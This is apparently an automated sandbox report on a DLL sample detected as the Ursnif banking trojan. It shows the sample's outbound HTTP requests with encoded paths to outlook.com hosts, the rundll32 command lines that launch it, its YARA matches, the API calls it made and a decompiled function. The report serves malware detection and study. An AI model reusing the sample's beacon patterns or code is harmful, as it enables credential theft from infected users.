2021-10-11 20:51:06 UTC	2	OUT	GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: outlook.com
2021-10-11 20:51:07 UTC	3	IN	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Pragma: no-cache Location: https://www.outlook.com/signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre Server: Microsoft-IIS/10.0 request-id: 0d39011c-5f71-d4f2-94a2-b4740c04222e Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-FEServer: MWHPR11CA0029 X-RequestId: 2496765a-2f5e-4b25-a5c1-1a7921663dbf MS-CV: HAE5DXFf8tSUorR0DAQiLg.0 X-Powered-By: ASP.NET X-FEServer: MWHPR11CA0029 Date: Mon, 11 Oct 2021 20:51:06 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49786	52.98.152.242	443	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-11 20:51:07 UTC	3	OUT	GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: www.outlook.com
2021-10-11 20:51:07 UTC	4	IN	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Pragma: no-cache Location: https://outlook.office365.com/signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre Server: Microsoft-IIS/10.0 request-id: 20c73dfc-91cc-b1e4-fc6c-e6c0f5a079a5 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-FEServer: FR0P281CA0081 X-RequestId: b31cb493-e0fd-45f3-b44e-e5d953cc9c82 MS-CV: /D3HIMyR5LH8bObA9aB5pQ.0 X-Powered-By: ASP.NET X-FEServer: FR0P281CA0081 Date: Mon, 11 Oct 2021 20:51:06 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49787	52.97.137.242	443	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-11 20:51:07 UTC	4	OUT	GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: outlook.office365.com
2021-10-11 20:51:07 UTC	5	IN	HTTP/1.1 404 Not Found Content-Length: 1245 Content-Type: text/html Server: Microsoft-IIS/10.0 request-id: 42a9a6e9-6dd8-e4f4-89ca-fa996edc4ee9 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-CalculatedFETarget: AM0PR03CU001.internal.outlook.com X-BackEndHttpStatus: 404 X-FEProxyInfo: AM0PR03CA0028.EURPRD03.PROD.OUTLOOK.COM X-CalculatedBETarget: AM0P195MB0754.EURP195.PROD.OUTLOOK.COM X-BackEndHttpStatus: 404 X-RUM-Validated: 1 X-Proxy-RoutingCorrectness: 1 X-Proxy-BackendServerStatus: 404 MS-CV: 6aapQtht9OSJyvqZbtxO6Q.1.1 X-FEServer: AM0PR03CA0028 X-Powered-By: ASP.NET X-FEServer: AM6P195CA0091 Date: Mon, 11 Oct 2021 20:51:06 GMT Connection: close
2021-10-11 20:51:07 UTC	5	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49788	40.97.161.50	443	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-11 20:51:07 UTC	7	OUT	GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: outlook.com
2021-10-11 20:51:07 UTC	7	IN	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Pragma: no-cache Location: https://www.outlook.com/signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre Server: Microsoft-IIS/10.0 request-id: 147732a4-d3b1-c9bb-f944-8ef989c698f5 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-FEServer: MWHPR11CA0038 X-RequestId: 669cb4a2-e956-4302-840a-f8c92f7287f1 MS-CV: pDJ3FLHTu8n5RI75icaY9Q.0 X-Powered-By: ASP.NET X-FEServer: MWHPR11CA0038 Date: Mon, 11 Oct 2021 20:51:07 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49789	52.98.208.66	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-11 20:51:08 UTC	8	OUT	GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: www.outlook.com
2021-10-11 20:51:08 UTC	8	IN	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Pragma: no-cache Location: https://outlook.office365.com/signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre Server: Microsoft-IIS/10.0 request-id: c3b60ebc-4628-a210-61a3-c0befcc5de97 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-FEServer: AS9PR06CA0083 X-RequestId: 6a98d4fd-3718-43df-872f-1dc2d4341b22 MS-CV: vA62wyhGEKJho8C+/MXelw.0 X-Powered-By: ASP.NET X-FEServer: AS9PR06CA0083 Date: Mon, 11 Oct 2021 20:51:07 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49790	40.101.9.178	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-11 20:51:08 UTC	9	OUT	GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: outlook.office365.com
2021-10-11 20:51:08 UTC	9	IN	HTTP/1.1 404 Not Found Content-Length: 1245 Content-Type: text/html Server: Microsoft-IIS/10.0 request-id: 6a56c307-e9c6-c4f1-93bd-eb8372a66b3c Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-CalculatedBETarget: AM5PR0202MB2546.eurprd02.prod.outlook.com X-BackEndHttpStatus: 404 X-Proxy-RoutingCorrectness: 1 X-Proxy-BackendServerStatus: 404 MS-CV: B8NWasbp8cSTveuDcqZrPA.1 X-Powered-By: ASP.NET X-FEServer: AM5PR0201CA0014 Date: Mon, 11 Oct 2021 20:51:07 GMT Connection: close
2021-10-11 20:51:08 UTC	10	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 3708 Parent PID: 5996

General

Start time:	22:48:26
Start date:	11/10/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll'
Imagebase:	0x1a0000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6044 Parent PID: 3708

General

Start time:	22:48:27
Start date:	11/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6048 Parent PID: 3708

General

Start time:	22:48:27
Start date:	11/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass
Imagebase:	0x13d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5172 Parent PID: 6044

General

Start time:	22:48:27
Start date:	11/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
Imagebase:	0x13d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4680 Parent PID: 3708

General

Start time:	22:48:32
Start date:	11/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight
Imagebase:	0x13d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3056 Parent PID: 3708

General

Start time:	22:48:39
Start date:	11/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often
Imagebase:	0x13d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 476 Parent PID: 6048

General

Start time:	22:50:16
Start date:	11/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 892
Imagebase:	0x10c0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 984 Parent PID: 4680

General

Start time:	22:50:17
Start date:	11/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 636
Imagebase:	0x10c0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 2100 Parent PID: 3056

General

Start time:	22:50:25
Start date:	11/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 872
Imagebase:	0x10c0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 3708 Parent PID: 5996 loaddll32.exeCOMMON

Executed Functions

Function 6ED8DFDA, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000008C9,00003000,00000040,000008C9,6ED8DA28), ref: 6ED8E097
VirtualAlloc.KERNEL32(00000000,00000128,00003000,00000040,6ED8DA88), ref: 6ED8E0CE
VirtualAlloc.KERNEL32(00000000,00016396,00003000,00000040), ref: 6ED8E12E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6ED8E164
VirtualProtect.KERNEL32(6ECE0000,00000000,00000004,6ED8DFB9), ref: 6ED8E269
VirtualProtect.KERNEL32(6ECE0000,00001000,00000004,6ED8DFB9), ref: 6ED8E290
VirtualProtect.KERNEL32(00000000,?,00000002,6ED8DFB9), ref: 6ED8E35D
VirtualProtect.KERNEL32(00000000,?,00000002,6ED8DFB9,?), ref: 6ED8E3B3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6ED8E3CF

Memory Dump Source

Source File: 00000000.00000002.645204954.000000006ED8D000.00000040.00020000.sdmp, Offset: 6ED8D000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
Instruction ID: 9b39ac4fdf3e32e0506fadb9f5edc21ed6be796690f9b31e2b169904d688c1d8
Opcode Fuzzy Hash: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
Instruction Fuzzy Hash: 2FD17772520621AFDB12CF58CD80B5277E7FF48B92F0941A5ED4A9F34AD370AA018F64

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE15C6, Relevance: 13.6, APIs: 9, Instructions: 120
sleepnativesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E6ECE15C6(char _a4) {
				long _v8;
				long _v12;
				char _v36;
				void* __edi;
				long _t25;
				long _t27;
				long _t28;
				long _t32;
				void* _t38;
				intOrPtr _t40;
				signed int _t44;
				signed int _t45;
				long _t50;
				intOrPtr _t52;
				signed int _t53;
				void* _t57;
				void* _t60;
				signed int _t62;
				signed int _t63;
				void* _t67;
				intOrPtr* _t68;

				_t25 = E6ECE1825();
				_v8 = _t25;
				if(_t25 != 0) {
					return _t25;
				}
				do {
					_t62 = 0;
					_v12 = 0;
					_t50 = 0x30;
					do {
						_t57 = E6ECE1000(_t50);
						if(_t57 == 0) {
							_v8 = 8;
						} else {
							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
							_t53 = _t44;
							_t45 = _t44 & 0x0000ffff;
							_v8 = _t45;
							if(_t45 == 4) {
								_t50 = _t50 + 0x30;
							}
							_t63 = 0x13;
							_t10 = _t53 + 1; // 0x1
							_t62 =  *_t57 % _t63 + _t10;
							E6ECE1397(_t57);
						}
					} while (_v8 != 0);
					_t27 = E6ECE189E(_t57, _t62); // executed
					_v8 = _t27;
					Sleep(_t62 << 4); // executed
					_t28 = _v8;
				} while (_t28 == 9);
				if(_t28 != 0) {
					L25:
					return _t28;
				}
				if(_a4 != 0) {
					L18:
					_push(0);
					_t67 = E6ECE153C(E6ECE10B9,  &_v36);
					if(_t67 == 0) {
						_v8 = GetLastError();
					} else {
						_t32 = WaitForSingleObject(_t67, 0xffffffff);
						_v8 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t67,  &_v8);
						}
						CloseHandle(_t67);
					}
					_t28 = _v8;
					if(_t28 == 0xffffffff) {
						_t28 = GetLastError();
					}
					goto L25;
				}
				if(E6ECE1AD7(_t53,  &_a4) != 0) {
					 *0x6ece41b8 = 0;
					goto L18;
				}
				_t52 = _a4;
				_t68 = __imp__GetLongPathNameW;
				_t38 =  *_t68(_t52, 0, 0); // executed
				_t60 = _t38;
				if(_t60 == 0) {
					L16:
					 *0x6ece41b8 = _t52;
					goto L18;
				}
				_t19 = _t60 + 2; // 0x2
				_t40 = E6ECE1000(_t60 + _t19);
				 *0x6ece41b8 = _t40;
				if(_t40 == 0) {
					goto L16;
				}
				 *_t68(_t52, _t40, _t60); // executed
				E6ECE1397(_t52);
				goto L18;
			}

0x6ece15cc
0x6ece15d1
0x6ece15d6
0x6ece1701
0x6ece1701
0x6ece15df
0x6ece15df
0x6ece15e3
0x6ece15e6
0x6ece15e7
0x6ece15ed
0x6ece15f1
0x6ece1628
0x6ece15f3
0x6ece15fb
0x6ece1601
0x6ece1603
0x6ece1608
0x6ece160e
0x6ece1610
0x6ece1610
0x6ece1617
0x6ece161d
0x6ece161d
0x6ece1621
0x6ece1621
0x6ece162f
0x6ece1636
0x6ece163f
0x6ece1642
0x6ece1648
0x6ece164b
0x6ece1654
0x6ece16fd
0x00000000
0x6ece16ff
0x6ece165d
0x6ece16ae
0x6ece16ae
0x6ece16c4
0x6ece16c8
0x6ece16f0
0x6ece16ca
0x6ece16cd
0x6ece16d3
0x6ece16d8
0x6ece16df
0x6ece16df
0x6ece16e6
0x6ece16e6
0x6ece16f3
0x6ece16f9
0x6ece16fb
0x6ece16fb
0x00000000
0x6ece16f9
0x6ece166a
0x6ece16a8
0x00000000
0x6ece16a8
0x6ece166c
0x6ece1671
0x6ece1678
0x6ece167a
0x6ece167e
0x6ece16a0
0x6ece16a0
0x00000000
0x6ece16a0
0x6ece1680
0x6ece1685
0x6ece168a
0x6ece1691
0x00000000
0x00000000
0x6ece1696
0x6ece1699
0x00000000

APIs

Part of subcall function 6ECE1825: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6ECE15D1), ref: 6ECE1834
Part of subcall function 6ECE1825: GetVersion.KERNEL32 ref: 6ECE1843
Part of subcall function 6ECE1825: GetCurrentProcessId.KERNEL32 ref: 6ECE185F
Part of subcall function 6ECE1825: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6ECE1878

Part of subcall function 6ECE1000: HeapAlloc.KERNEL32(00000000,?,6ECE15ED,00000030,751463F0,00000000), ref: 6ECE100C

NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 6ECE15FB
Sleep.KERNELBASE(00000000,00000000,00000030,751463F0,00000000), ref: 6ECE1642
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6ECE1678
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6ECE1696
